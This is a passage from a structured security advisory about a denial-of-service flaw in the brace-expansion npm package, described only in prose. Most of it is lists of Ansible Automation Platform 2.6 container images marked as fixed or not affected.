"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2494813"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in brace-expansion. An attacker can exploit a vulnerability in the `expand()` function by providing a specially crafted string. This string, containing consecutive non-expanding brace groups, can trigger exponential-time complexity, leading to significant CPU consumption and event-loop blocking. This can result in a Denial of Service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "brace-expansion: Brace-expansion: Denial of Service due to exponential-time complexity",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in brace-expansion, a widely-used npm package for expanding brace sequences. The expand() function exhibits exponential-time complexity when processing consecutive non-expanding brace groups. An attacker who can supply crafted input to expand(), directly or transitively via minimatch or glob, can cause significant CPU consumption and event-loop blocking, resulting in denial of service. The max option does not mitigate this issue, as it bounds the output size rather than the recursion work.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
